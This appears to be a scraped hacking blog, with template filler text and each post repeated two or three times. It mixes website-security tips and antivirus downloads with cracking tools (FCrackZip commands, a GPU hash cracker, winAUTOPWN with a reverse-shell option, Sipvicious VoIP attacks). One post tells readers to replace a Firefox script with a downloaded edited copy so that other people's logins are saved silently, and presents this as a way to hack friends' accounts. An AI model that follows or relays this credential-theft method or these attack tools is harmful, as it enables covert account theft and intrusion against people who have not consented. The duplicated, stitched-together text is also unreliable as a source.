I Am King Of India

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Never Stop Me Now In This World

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Programming Master Mind Coder

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Pages

Master Coder

Hacking News , Cyber Crime , Ethical Hacking , CCNA, Seo , Google Adsense , Web Development ,

Secure Your Website in 10 Best Methods

Stop the Hack and Secure Your Website in 10 Best Methods

If you are a business owner, then you must know how important it is for you to have your own website. You can use it to be able to reach as many target customers as possible. After all, they are located in almost many parts of the world. You can display all your products and services in your website. But do you know that they can be a great area for hackers to play on? So how can you protect your website against hacking?

1. Protect your files with passwords. Surely, your website will contain scripts, database, and files that are not meant to be shared publicly but for perhaps the search engine bots. To avoid having anyone getting hold of them, it may be ideal to protect them with password. However, you have to make sure that these are very hard to decipher. This is because they can simply make use of password-deciphering software. You can combine alphanumeric characters and exhaust all the character limits as much as possible.

2. Secure your e-mail address. There may be times when you will be receiving an e-mail address courtesy of your online business form. There are even others who will send a message directly into your mailbox. This may mean that spammers have got hold of your contact information perhaps in the Web or from someone else. To prevent this, you can make use of software that will split your e-mail address. It will then very hard for spamming software to read. You can also just add an E-mail Us link into your website or an image which can be clicked and allow your customers to send an e-mail right away. There’s no need to reveal the e-mail address.

3. Don’t leave e-mail addresses anywhere. Perhaps youre thinking of marketing your website in forums and other public online networks. This is okay; however, you have to be very cautious. Hackers and spammers are very much interested of your e-mail address. You can make use of a bogus one, and simply add a link of your website in the signature.

. Secure your source code. There are hackers who are interested in getting your source code to either destroy it or to build a website clone. That’s why it is very important that you can protect it against such individuals. You can make use of scripts that will allow your source code to remain hidden to Internet users. Or you can simply make use of external CSS sheets as well as files for Javascript.

5. Check for software patches. If you have been using some software in building or maintaining your website, make sure that you constantly update all of your files. This may be because the older ones can no longer protect your website from hackers and spammers.

6. Sign up for updates. Majority of the product and software updates may only be announced in their respective websites. This is to encourage their customers to continuously be up-to-date too of any new products that they are currently introducing into the market. To avoid the hassle, sign up using one secure e-mail address in all of their newsletters. If you receive any updates, make sure you take time in reading them.

7. Add a robot.txt. This is a special instruction you will give to search engines who may be visiting your webpages. You can instruct them to only index those files that are meant for users. You can also direct them to not index any that are only meant for webmasters. These may include files and images.

8. Check the permissions you may have set for your uploaded files. This is to prevent any hacker from getting access into your important and confidential files. You can confirm it by selecting CHMOD for your files located in the web hosting server. Otherwise, if you aren’t sure, then you can simply verify it from your webmaster.

9. Take away old or unnecessary files. Its normal for search engines to keep files from your website, especially if they are being indexed. However, if you remove them from the server, then no one can access them anymore. It will not be obtainable for hackers and spammers.

10. Know your server. Your server is very essential as you basically keep all of your files there, and it will cause your website to run smoothly. Intruders, on the other hand, can add virus or malware into your system, thereby causing damage into your website. If you are running it on your own, you must know your server properly. This way, you can set the right security and permission level for your site. 

Secure Your Website in 10 Best Methods

Stop the Hack and Secure Your Website in 10 Best Methods

If you are a business owner, then you must know how important it is for you to have your own website. You can use it to be able to reach as many target customers as possible. After all, they are located in almost many parts of the world. You can display all your products and services in your website. But do you know that they can be a great area for hackers to play on? So how can you protect your website against hacking?

1. Protect your files with passwords. Surely, your website will contain scripts, database, and files that are not meant to be shared publicly but for perhaps the search engine bots. To avoid having anyone getting hold of them, it may be ideal to protect them with password. However, you have to make sure that these are very hard to decipher. This is because they can simply make use of password-deciphering software. You can combine alphanumeric characters and exhaust all the character limits as much as possible.

2. Secure your e-mail address. There may be times when you will be receiving an e-mail address courtesy of your online business form. There are even others who will send a message directly into your mailbox. This may mean that spammers have got hold of your contact information perhaps in the Web or from someone else. To prevent this, you can make use of software that will split your e-mail address. It will then very hard for spamming software to read. You can also just add an E-mail Us link into your website or an image which can be clicked and allow your customers to send an e-mail right away. There’s no need to reveal the e-mail address.

3. Don’t leave e-mail addresses anywhere. Perhaps youre thinking of marketing your website in forums and other public online networks. This is okay; however, you have to be very cautious. Hackers and spammers are very much interested of your e-mail address. You can make use of a bogus one, and simply add a link of your website in the signature.

. Secure your source code. There are hackers who are interested in getting your source code to either destroy it or to build a website clone. That’s why it is very important that you can protect it against such individuals. You can make use of scripts that will allow your source code to remain hidden to Internet users. Or you can simply make use of external CSS sheets as well as files for Javascript.

5. Check for software patches. If you have been using some software in building or maintaining your website, make sure that you constantly update all of your files. This may be because the older ones can no longer protect your website from hackers and spammers.

6. Sign up for updates. Majority of the product and software updates may only be announced in their respective websites. This is to encourage their customers to continuously be up-to-date too of any new products that they are currently introducing into the market. To avoid the hassle, sign up using one secure e-mail address in all of their newsletters. If you receive any updates, make sure you take time in reading them.

7. Add a robot.txt. This is a special instruction you will give to search engines who may be visiting your webpages. You can instruct them to only index those files that are meant for users. You can also direct them to not index any that are only meant for webmasters. These may include files and images.

8. Check the permissions you may have set for your uploaded files. This is to prevent any hacker from getting access into your important and confidential files. You can confirm it by selecting CHMOD for your files located in the web hosting server. Otherwise, if you aren’t sure, then you can simply verify it from your webmaster.

9. Take away old or unnecessary files. Its normal for search engines to keep files from your website, especially if they are being indexed. However, if you remove them from the server, then no one can access them anymore. It will not be obtainable for hackers and spammers.

10. Know your server. Your server is very essential as you basically keep all of your files there, and it will cause your website to run smoothly. Intruders, on the other hand, can add virus or malware into your system, thereby causing damage into your website. If you are running it on your own, you must know your server properly. This way, you can set the right security and permission level for your site. 

Secure Your Website in 10 Best Methods

Stop the Hack and Secure Your Website in 10 Best Methods

If you are a business owner, then you must know how important it is for you to have your own website. You can use it to be able to reach as many target customers as possible. After all, they are located in almost many parts of the world. You can display all your products and services in your website. But do you know that they can be a great area for hackers to play on? So how can you protect your website against hacking?

1. Protect your files with passwords. Surely, your website will contain scripts, database, and files that are not meant to be shared publicly but for perhaps the search engine bots. To avoid having anyone getting hold of them, it may be ideal to protect them with password. However, you have to make sure that these are very hard to decipher. This is because they can simply make use of password-deciphering software. You can combine alphanumeric characters and exhaust all the character limits as much as possible.

2. Secure your e-mail address. There may be times when you will be receiving an e-mail address courtesy of your online business form. There are even others who will send a message directly into your mailbox. This may mean that spammers have got hold of your contact information perhaps in the Web or from someone else. To prevent this, you can make use of software that will split your e-mail address. It will then very hard for spamming software to read. You can also just add an E-mail Us link into your website or an image which can be clicked and allow your customers to send an e-mail right away. There’s no need to reveal the e-mail address.

3. Don’t leave e-mail addresses anywhere. Perhaps youre thinking of marketing your website in forums and other public online networks. This is okay; however, you have to be very cautious. Hackers and spammers are very much interested of your e-mail address. You can make use of a bogus one, and simply add a link of your website in the signature.

. Secure your source code. There are hackers who are interested in getting your source code to either destroy it or to build a website clone. That’s why it is very important that you can protect it against such individuals. You can make use of scripts that will allow your source code to remain hidden to Internet users. Or you can simply make use of external CSS sheets as well as files for Javascript.

5. Check for software patches. If you have been using some software in building or maintaining your website, make sure that you constantly update all of your files. This may be because the older ones can no longer protect your website from hackers and spammers.

6. Sign up for updates. Majority of the product and software updates may only be announced in their respective websites. This is to encourage their customers to continuously be up-to-date too of any new products that they are currently introducing into the market. To avoid the hassle, sign up using one secure e-mail address in all of their newsletters. If you receive any updates, make sure you take time in reading them.

7. Add a robot.txt. This is a special instruction you will give to search engines who may be visiting your webpages. You can instruct them to only index those files that are meant for users. You can also direct them to not index any that are only meant for webmasters. These may include files and images.

8. Check the permissions you may have set for your uploaded files. This is to prevent any hacker from getting access into your important and confidential files. You can confirm it by selecting CHMOD for your files located in the web hosting server. Otherwise, if you aren’t sure, then you can simply verify it from your webmaster.

9. Take away old or unnecessary files. Its normal for search engines to keep files from your website, especially if they are being indexed. However, if you remove them from the server, then no one can access them anymore. It will not be obtainable for hackers and spammers.

10. Know your server. Your server is very essential as you basically keep all of your files there, and it will cause your website to run smoothly. Intruders, on the other hand, can add virus or malware into your system, thereby causing damage into your website. If you are running it on your own, you must know your server properly. This way, you can set the right security and permission level for your site. 

Online Search Engine

FileTram is a online Search Engine specialy for Rapidshare, Megaupload, 4shared, Mediafire, Hotfile Files. 



We know it has nothing to do with information security but still we all need to have some entertainment or need to search some file which are not easily available.

How FileTram Works?

Once you enter the search item in the provided field and click on the Search Files button,it will
list out all the realeted searches. Now you can sort them based on the file sharing site(tht
means you can list out only Rapidshare files,only Megaupload files,only Medifire files etc.)

Click here to start searching

Online Search Engine

FileTram is a online Search Engine specialy for Rapidshare, Megaupload, 4shared, Mediafire, Hotfile Files. 



We know it has nothing to do with information security but still we all need to have some entertainment or need to search some file which are not easily available.

How FileTram Works?

Once you enter the search item in the provided field and click on the Search Files button,it will
list out all the realeted searches. Now you can sort them based on the file sharing site(tht
means you can list out only Rapidshare files,only Megaupload files,only Medifire files etc.)

Click here to start searching

Online Search Engine

FileTram is a online Search Engine specialy for Rapidshare, Megaupload, 4shared, Mediafire, Hotfile Files. 



We know it has nothing to do with information security but still we all need to have some entertainment or need to search some file which are not easily available.

How FileTram Works?

Once you enter the search item in the provided field and click on the Search Files button,it will
list out all the realeted searches. Now you can sort them based on the file sharing site(tht
means you can list out only Rapidshare files,only Megaupload files,only Medifire files etc.)

Click here to start searching

The Google Hack Database Tool

Google Hack DB Tool is a database tool with almost 8,000 entries. It allows administrators the ability to check their site for vulnerabilities based on data stored in Google. With Google Hack Database tool you can find out if your website has indexed vulnerabilities in Google.




This can lead to sensitive information disclosure. This way you can find out what Google knows about you. 7974 entries,including 4203 for SQL Injection.

So be sure to scan your public facing web applications frequently and eliminate all vulnerabilities.

Features:

  • Find information disclosure
  • Find sensitive files
  • Find sensitive directories
  • Find vulnerable software
  • Find personal information
These tool is really fast and will help to eliminate most of the known vulnerabilities that
web application developers tend to do easily, simply and most important fast and accurate.



Download Google Hack Database Tool v1.0: Download

Microsoft Security Essentials

Microsoft Security Essentials provides realtime Protection for your home or small buisness PC
that guards against viruses,spyware,and other malicious software.






Overview


Microsft Security Essentials is a free* Download from Microsoft that is simple to install,easy
to use, and always kept up-tp-date so you can be assured your PC is Protected by the latest technology.

Microsoft Security Essentials runs quietly and efficiently in the background so you're free to
use your Windows-based PC the way you want-without interruptions or long computer wait times.

Before installing Microsoft Security Essentials,we recommend that you uninstall other antivirus software already running on your PC. Running more than one antivirus program at the same time can potentially cause conflicts that affect PC performance.

* Your PC must run genuie Windows to install Microsoft Security Essential



Download:

64 bit 

32 Bit

The Google Hack Database Tool

Google Hack DB Tool is a database tool with almost 8,000 entries. It allows administrators the ability to check their site for vulnerabilities based on data stored in Google. With Google Hack Database tool you can find out if your website has indexed vulnerabilities in Google.




This can lead to sensitive information disclosure. This way you can find out what Google knows about you. 7974 entries,including 4203 for SQL Injection.

So be sure to scan your public facing web applications frequently and eliminate all vulnerabilities.

Features:

  • Find information disclosure
  • Find sensitive files
  • Find sensitive directories
  • Find vulnerable software
  • Find personal information
These tool is really fast and will help to eliminate most of the known vulnerabilities that
web application developers tend to do easily, simply and most important fast and accurate.



Download Google Hack Database Tool v1.0: Download

Microsoft Security Essentials

Microsoft Security Essentials provides realtime Protection for your home or small buisness PC
that guards against viruses,spyware,and other malicious software.






Overview


Microsft Security Essentials is a free* Download from Microsoft that is simple to install,easy
to use, and always kept up-tp-date so you can be assured your PC is Protected by the latest technology.

Microsoft Security Essentials runs quietly and efficiently in the background so you're free to
use your Windows-based PC the way you want-without interruptions or long computer wait times.

Before installing Microsoft Security Essentials,we recommend that you uninstall other antivirus software already running on your PC. Running more than one antivirus program at the same time can potentially cause conflicts that affect PC performance.

* Your PC must run genuie Windows to install Microsoft Security Essential



Download:

64 bit 

32 Bit

The Google Hack Database Tool

Google Hack DB Tool is a database tool with almost 8,000 entries. It allows administrators the ability to check their site for vulnerabilities based on data stored in Google. With Google Hack Database tool you can find out if your website has indexed vulnerabilities in Google.




This can lead to sensitive information disclosure. This way you can find out what Google knows about you. 7974 entries,including 4203 for SQL Injection.

So be sure to scan your public facing web applications frequently and eliminate all vulnerabilities.

Features:

  • Find information disclosure
  • Find sensitive files
  • Find sensitive directories
  • Find vulnerable software
  • Find personal information
These tool is really fast and will help to eliminate most of the known vulnerabilities that
web application developers tend to do easily, simply and most important fast and accurate.



Download Google Hack Database Tool v1.0: Download

Microsoft Security Essentials

Microsoft Security Essentials provides realtime Protection for your home or small buisness PC
that guards against viruses,spyware,and other malicious software.






Overview


Microsft Security Essentials is a free* Download from Microsoft that is simple to install,easy
to use, and always kept up-tp-date so you can be assured your PC is Protected by the latest technology.

Microsoft Security Essentials runs quietly and efficiently in the background so you're free to
use your Windows-based PC the way you want-without interruptions or long computer wait times.

Before installing Microsoft Security Essentials,we recommend that you uninstall other antivirus software already running on your PC. Running more than one antivirus program at the same time can potentially cause conflicts that affect PC performance.

* Your PC must run genuie Windows to install Microsoft Security Essential



Download:

64 bit 

32 Bit

How to turn your Firefox Into A Keylogger.




How we can turn our Mozilla Firefox into an undetectable keylogger. This keylogger will be used to store all the usernames and passwords that will be entered by the user. So that you can hack or audit for ethical reasons your friends accounts.

No additional software or tool is required just need to replace it with existing one.

Steps to Turn Your Firefox Into A KeyLogger

  • Close Firefox Application if open
  • Go to: Windows- C:/Program Files/Mozilla Firefox/Components
  • Find The Script Named " nsLoginManagerPrompter.js"
  • Click here to download the file unzip it and simply overwrite the existing nsLoginManagerPrompter.js with it, it is one already edited to save all usernames and passwords with user intimation.

From now on, when someone logs onto any site, they username and passwords will bw saved automatically, without prompt!

To retrieve the account information, make sure Firefox is opened, go to Tools > Options > Security Tab > click on saved passwords, then click on show passwords, and press yes

How to turn your Firefox Into A Keylogger.




How we can turn our Mozilla Firefox into an undetectable keylogger. This keylogger will be used to store all the usernames and passwords that will be entered by the user. So that you can hack or audit for ethical reasons your friends accounts.

No additional software or tool is required just need to replace it with existing one.

Steps to Turn Your Firefox Into A KeyLogger

  • Close Firefox Application if open
  • Go to: Windows- C:/Program Files/Mozilla Firefox/Components
  • Find The Script Named " nsLoginManagerPrompter.js"
  • Click here to download the file unzip it and simply overwrite the existing nsLoginManagerPrompter.js with it, it is one already edited to save all usernames and passwords with user intimation.

From now on, when someone logs onto any site, they username and passwords will bw saved automatically, without prompt!

To retrieve the account information, make sure Firefox is opened, go to Tools > Options > Security Tab > click on saved passwords, then click on show passwords, and press yes

How to turn your Firefox Into A Keylogger.




How we can turn our Mozilla Firefox into an undetectable keylogger. This keylogger will be used to store all the usernames and passwords that will be entered by the user. So that you can hack or audit for ethical reasons your friends accounts.

No additional software or tool is required just need to replace it with existing one.

Steps to Turn Your Firefox Into A KeyLogger

  • Close Firefox Application if open
  • Go to: Windows- C:/Program Files/Mozilla Firefox/Components
  • Find The Script Named " nsLoginManagerPrompter.js"
  • Click here to download the file unzip it and simply overwrite the existing nsLoginManagerPrompter.js with it, it is one already edited to save all usernames and passwords with user intimation.

From now on, when someone logs onto any site, they username and passwords will bw saved automatically, without prompt!

To retrieve the account information, make sure Firefox is opened, go to Tools > Options > Security Tab > click on saved passwords, then click on show passwords, and press yes

FCrackZip: Free Zip Password Cracker



fcrackzip searches each zipfile given for encrypted files and tries to guess the password.

Methods used by FCrackZip:

  • ZIP password Basics
  • Brute Force Mode
  • Dictionary Mode
  • CP Mask

How to use FCrackZip:
  1. fcrackzip -c a -p aaaaaa sample.zipchecks the encrypted files in sample.zip for all lowercase 6 character passwords (aaaaaa ... abaaba ... zzzzzz).
  2. fcrackzip -method cpmask -charset A -init AAAA test.ppmchecks the obscured image test.ppm for all four character passwords. -TP fcrackzip -D -p passwords.txt sample.zip check for every password listed in the file passwords.txt.

Download fcrackzip from here: Download

FCrackZip: Free Zip Password Cracker



fcrackzip searches each zipfile given for encrypted files and tries to guess the password.

Methods used by FCrackZip:

  • ZIP password Basics
  • Brute Force Mode
  • Dictionary Mode
  • CP Mask

How to use FCrackZip:
  1. fcrackzip -c a -p aaaaaa sample.zipchecks the encrypted files in sample.zip for all lowercase 6 character passwords (aaaaaa ... abaaba ... zzzzzz).
  2. fcrackzip -method cpmask -charset A -init AAAA test.ppmchecks the obscured image test.ppm for all four character passwords. -TP fcrackzip -D -p passwords.txt sample.zip check for every password listed in the file passwords.txt.

Download fcrackzip from here: Download

FCrackZip: Free Zip Password Cracker



fcrackzip searches each zipfile given for encrypted files and tries to guess the password.

Methods used by FCrackZip:

  • ZIP password Basics
  • Brute Force Mode
  • Dictionary Mode
  • CP Mask

How to use FCrackZip:
  1. fcrackzip -c a -p aaaaaa sample.zipchecks the encrypted files in sample.zip for all lowercase 6 character passwords (aaaaaa ... abaaba ... zzzzzz).
  2. fcrackzip -method cpmask -charset A -init AAAA test.ppmchecks the obscured image test.ppm for all four character passwords. -TP fcrackzip -D -p passwords.txt sample.zip check for every password listed in the file passwords.txt.

Download fcrackzip from here: Download

Multi Scan: Free Multiple Antivirus Engine Scanner For Windows.



Multi engine anti-virus/malware scanners are popular as an online service allowing users to upload and scan suspicious files with most popular anti-virus engines,however, the online solution is not practical in situations where the users needs to scan a lot of files and folders.
For such need we have freeware utility "Multiscan" - allowing users to scan any number of files or folders using configurable, multiple, 3rd party,command-line anti-virus/malwares scanners of their choice, all from a single interface.


There are other online tools also available but it is always better to have more options.


Features of Multi Scan:
  • Portable utility requires no installation; does not write to registry unless you choose to do so; configuration file written to program firectory.
  • Run up to 10 applications consecutively in the order you choose, or run them concurrently
  • Easily access MultiScan from the windows explorer context menu (optional)
  • Quickly save and switch between multiple configurations of virus scanners
  • Quickly save and switch between multiple pre-configured lists of objects to scan

Download MultiScan fro here: Download

Multi Scan: Free Multiple Antivirus Engine Scanner For Windows.



Multi engine anti-virus/malware scanners are popular as an online service allowing users to upload and scan suspicious files with most popular anti-virus engines,however, the online solution is not practical in situations where the users needs to scan a lot of files and folders.
For such need we have freeware utility "Multiscan" - allowing users to scan any number of files or folders using configurable, multiple, 3rd party,command-line anti-virus/malwares scanners of their choice, all from a single interface.


There are other online tools also available but it is always better to have more options.


Features of Multi Scan:
  • Portable utility requires no installation; does not write to registry unless you choose to do so; configuration file written to program firectory.
  • Run up to 10 applications consecutively in the order you choose, or run them concurrently
  • Easily access MultiScan from the windows explorer context menu (optional)
  • Quickly save and switch between multiple configurations of virus scanners
  • Quickly save and switch between multiple pre-configured lists of objects to scan

Download MultiScan fro here: Download

Multi Scan: Free Multiple Antivirus Engine Scanner For Windows.



Multi engine anti-virus/malware scanners are popular as an online service allowing users to upload and scan suspicious files with most popular anti-virus engines,however, the online solution is not practical in situations where the users needs to scan a lot of files and folders.
For such need we have freeware utility "Multiscan" - allowing users to scan any number of files or folders using configurable, multiple, 3rd party,command-line anti-virus/malwares scanners of their choice, all from a single interface.


There are other online tools also available but it is always better to have more options.


Features of Multi Scan:
  • Portable utility requires no installation; does not write to registry unless you choose to do so; configuration file written to program firectory.
  • Run up to 10 applications consecutively in the order you choose, or run them concurrently
  • Easily access MultiScan from the windows explorer context menu (optional)
  • Quickly save and switch between multiple configurations of virus scanners
  • Quickly save and switch between multiple pre-configured lists of objects to scan

Download MultiScan fro here: Download

Voip Attacks with Sipvicious



In this video i explain how use sipvicious to attack or audit a real VoIP network.




Sipvicious is available on backtrack or you can download here: DOWNLOAD

Voip Attacks with Sipvicious



In this video i explain how use sipvicious to attack or audit a real VoIP network.




Sipvicious is available on backtrack or you can download here: DOWNLOAD

Voip Attacks with Sipvicious



In this video i explain how use sipvicious to attack or audit a real VoIP network.




Sipvicious is available on backtrack or you can download here: DOWNLOAD

Firefox 5.0 released: Available for Download


 

 Stability, speed, and better Android support stand out among changes in the newest version of Mozilla's popular Firefor browser.

The popular alternative Web browser to Internet Explorer, take note of a new version that became available last week. While Firefox 5 does not represent not a huge user interface upgrade compared to version 4, some interesting changes lurk under the hood.

Consider these five reasons why you may want to upgrade to firefox 5.
  1. Added support for CSS animation.
  2. Easier to find Do Not Track button.
  3. The latest version is more stable.
  4. Better support for Android devices.
  5. Improve performance: Most people know that Fiefox likes to be a hog with your system resources. I tested Firefox 5.0 on Windows 7, Android 2.2, and the latest release of Mac OS X. Overall i was impressed with improved response and better security.

Upgrade Firefox 5.0 from here: Upgrade

Firefox 5.0 released: Available for Download


 

 Stability, speed, and better Android support stand out among changes in the newest version of Mozilla's popular Firefor browser.

The popular alternative Web browser to Internet Explorer, take note of a new version that became available last week. While Firefox 5 does not represent not a huge user interface upgrade compared to version 4, some interesting changes lurk under the hood.

Consider these five reasons why you may want to upgrade to firefox 5.
  1. Added support for CSS animation.
  2. Easier to find Do Not Track button.
  3. The latest version is more stable.
  4. Better support for Android devices.
  5. Improve performance: Most people know that Fiefox likes to be a hog with your system resources. I tested Firefox 5.0 on Windows 7, Android 2.2, and the latest release of Mac OS X. Overall i was impressed with improved response and better security.

Upgrade Firefox 5.0 from here: Upgrade

Firefox 5.0 released: Available for Download


 

 Stability, speed, and better Android support stand out among changes in the newest version of Mozilla's popular Firefor browser.

The popular alternative Web browser to Internet Explorer, take note of a new version that became available last week. While Firefox 5 does not represent not a huge user interface upgrade compared to version 4, some interesting changes lurk under the hood.

Consider these five reasons why you may want to upgrade to firefox 5.
  1. Added support for CSS animation.
  2. Easier to find Do Not Track button.
  3. The latest version is more stable.
  4. Better support for Android devices.
  5. Improve performance: Most people know that Fiefox likes to be a hog with your system resources. I tested Firefox 5.0 on Windows 7, Android 2.2, and the latest release of Mac OS X. Overall i was impressed with improved response and better security.

Upgrade Firefox 5.0 from here: Upgrade

Features of Ultimate Boot CD

Many of us are familiar with hiren cd. Ultimate Boot CD is an alternative and a good one.

Features of Ultimate Boot CD:

  • Run floppy-based diagnostic tools from CDROM drives. More and more PCs are shipped without floppy drives these days, and it is such a royal pain when you need to run diagnostic tools on them.
  • Free yourself from the slow loading speed of the floppy drive. Even if you do have a floppy drive, it is still much much faster to run your diagnostic tools from the CDROM drive, rather than wait for the tool to load from the floppy drive.
  • Consolidate as many diagnostic tools as possible into one bootable CD. Wouldn't you like to avoid digging into the dusty box to look for the right floppy disk, but simply run them all from a single CD? Then the Ultimate Boot CD is for you!
  • Run Ultimate Boot CD from your USB memory stick. A script on the CD prepares your USB memory stick so that it can be used on newer machines that supports booting from USB devices. YOu can access the same tools as you would from the CD version.
  • The Linux-based distro Parted Magic is now included with UBCD V5.0. This should be the method of choices when you need to resize/rescue partitions, access NTFS filesystem or work with USB storage devices.
  • UBCD V5.0 now supports both syslinux/isolinux and grub4dos. This helps improve the chances that UBCD will boot on any particular machine.


View a video tutorial on ultimate boot cd to make maximum use. 




Download Ultimate Boot CD v5.0.3 from here: Download

Features of Ultimate Boot CD

Many of us are familiar with hiren cd. Ultimate Boot CD is an alternative and a good one.

Features of Ultimate Boot CD:

  • Run floppy-based diagnostic tools from CDROM drives. More and more PCs are shipped without floppy drives these days, and it is such a royal pain when you need to run diagnostic tools on them.
  • Free yourself from the slow loading speed of the floppy drive. Even if you do have a floppy drive, it is still much much faster to run your diagnostic tools from the CDROM drive, rather than wait for the tool to load from the floppy drive.
  • Consolidate as many diagnostic tools as possible into one bootable CD. Wouldn't you like to avoid digging into the dusty box to look for the right floppy disk, but simply run them all from a single CD? Then the Ultimate Boot CD is for you!
  • Run Ultimate Boot CD from your USB memory stick. A script on the CD prepares your USB memory stick so that it can be used on newer machines that supports booting from USB devices. YOu can access the same tools as you would from the CD version.
  • The Linux-based distro Parted Magic is now included with UBCD V5.0. This should be the method of choices when you need to resize/rescue partitions, access NTFS filesystem or work with USB storage devices.
  • UBCD V5.0 now supports both syslinux/isolinux and grub4dos. This helps improve the chances that UBCD will boot on any particular machine.


View a video tutorial on ultimate boot cd to make maximum use. 




Download Ultimate Boot CD v5.0.3 from here: Download

Features of Ultimate Boot CD

Many of us are familiar with hiren cd. Ultimate Boot CD is an alternative and a good one.

Features of Ultimate Boot CD:

  • Run floppy-based diagnostic tools from CDROM drives. More and more PCs are shipped without floppy drives these days, and it is such a royal pain when you need to run diagnostic tools on them.
  • Free yourself from the slow loading speed of the floppy drive. Even if you do have a floppy drive, it is still much much faster to run your diagnostic tools from the CDROM drive, rather than wait for the tool to load from the floppy drive.
  • Consolidate as many diagnostic tools as possible into one bootable CD. Wouldn't you like to avoid digging into the dusty box to look for the right floppy disk, but simply run them all from a single CD? Then the Ultimate Boot CD is for you!
  • Run Ultimate Boot CD from your USB memory stick. A script on the CD prepares your USB memory stick so that it can be used on newer machines that supports booting from USB devices. YOu can access the same tools as you would from the CD version.
  • The Linux-based distro Parted Magic is now included with UBCD V5.0. This should be the method of choices when you need to resize/rescue partitions, access NTFS filesystem or work with USB storage devices.
  • UBCD V5.0 now supports both syslinux/isolinux and grub4dos. This helps improve the chances that UBCD will boot on any particular machine.


View a video tutorial on ultimate boot cd to make maximum use. 




Download Ultimate Boot CD v5.0.3 from here: Download

Durandal v0.5: CPU/GPU Hash Cracker


Durandal is a distributed GPU/CPU computing software that aims to crack passwords. Mostly written in C++ with the Boost library, it works on many systems, however it is only buit for Windows and GNU/Linux for the moment x64 platforms.



Durandal can be used for:
  1. OS portability: It works and has been tested on Windows and GNU/Linux, but could work on *BSD, Solaris, or any other platforms that support C++ and the Boost library.
  2. Architecture Pertability: hash functions aren't only developped in SSE2 assembly and Nvidia CUDA; there is also a C version that could be ran on any architecture.
  3. Powerful: by using C++, Durandal has been designed in order to support a lot of computers.
  4. Performance: has functions are optimized with SSE2 for CPUs and ported to Nvidia CUda for GPUs.



Features of Durandal

  • Windows (XP, Vista, 7) and GNU/Linux support
  • 64bits support
  • Usual hash fuctions: MD5, SHA1, SHA256, SHA512, NTLMv1, MySQL (all versions)
  • SSE2 optimized, Nvidia CUDA support
  • Server, agent and administration console
  • Network communication with XML over HTTP (proxy support)

Download Durandal v0.5 from here: Download

Durandal v0.5: CPU/GPU Hash Cracker


Durandal is a distributed GPU/CPU computing software that aims to crack passwords. Mostly written in C++ with the Boost library, it works on many systems, however it is only buit for Windows and GNU/Linux for the moment x64 platforms.



Durandal can be used for:
  1. OS portability: It works and has been tested on Windows and GNU/Linux, but could work on *BSD, Solaris, or any other platforms that support C++ and the Boost library.
  2. Architecture Pertability: hash functions aren't only developped in SSE2 assembly and Nvidia CUDA; there is also a C version that could be ran on any architecture.
  3. Powerful: by using C++, Durandal has been designed in order to support a lot of computers.
  4. Performance: has functions are optimized with SSE2 for CPUs and ported to Nvidia CUda for GPUs.



Features of Durandal

  • Windows (XP, Vista, 7) and GNU/Linux support
  • 64bits support
  • Usual hash fuctions: MD5, SHA1, SHA256, SHA512, NTLMv1, MySQL (all versions)
  • SSE2 optimized, Nvidia CUDA support
  • Server, agent and administration console
  • Network communication with XML over HTTP (proxy support)

Download Durandal v0.5 from here: Download

Durandal v0.5: CPU/GPU Hash Cracker


Durandal is a distributed GPU/CPU computing software that aims to crack passwords. Mostly written in C++ with the Boost library, it works on many systems, however it is only buit for Windows and GNU/Linux for the moment x64 platforms.



Durandal can be used for:
  1. OS portability: It works and has been tested on Windows and GNU/Linux, but could work on *BSD, Solaris, or any other platforms that support C++ and the Boost library.
  2. Architecture Pertability: hash functions aren't only developped in SSE2 assembly and Nvidia CUDA; there is also a C version that could be ran on any architecture.
  3. Powerful: by using C++, Durandal has been designed in order to support a lot of computers.
  4. Performance: has functions are optimized with SSE2 for CPUs and ported to Nvidia CUda for GPUs.



Features of Durandal

  • Windows (XP, Vista, 7) and GNU/Linux support
  • 64bits support
  • Usual hash fuctions: MD5, SHA1, SHA256, SHA512, NTLMv1, MySQL (all versions)
  • SSE2 optimized, Nvidia CUDA support
  • Server, agent and administration console
  • Network communication with XML over HTTP (proxy support)

Download Durandal v0.5 from here: Download

WIN - AUTOPWN v2.7 Released

Our previous post about Armitage can be found here



These are the latest addition:
  • Added interbal variables and equivalent commandline parameters -perlrevshURL (for a PERL Reverse Shell URL), -mailFROM (smtpsender) and -mailTO (smtpreceiver).
  • Internal bugfixes and variable behaviour corrections.
  • Bugfix for -onlyscan in winAUTOPWN. This option as missing and had not been added as logged two versions before.
  • Various minor exploitname fixes in ahe exploits/ dorectory and binaries.
  • Bugfix for winAUTOPWN GUI where the CMS Path was mistakenly showing Active CMS Path was mistakenly showing Active CMS Path.
  • Bugfix for -doFRI -doRSH -doRCE implermentation conditions.


Download winAUTOPWN from here: Download

WIN - AUTOPWN v2.7 Released

Our previous post about Armitage can be found here



These are the latest addition:
  • Added interbal variables and equivalent commandline parameters -perlrevshURL (for a PERL Reverse Shell URL), -mailFROM (smtpsender) and -mailTO (smtpreceiver).
  • Internal bugfixes and variable behaviour corrections.
  • Bugfix for -onlyscan in winAUTOPWN. This option as missing and had not been added as logged two versions before.
  • Various minor exploitname fixes in ahe exploits/ dorectory and binaries.
  • Bugfix for winAUTOPWN GUI where the CMS Path was mistakenly showing Active CMS Path was mistakenly showing Active CMS Path.
  • Bugfix for -doFRI -doRSH -doRCE implermentation conditions.


Download winAUTOPWN from here: Download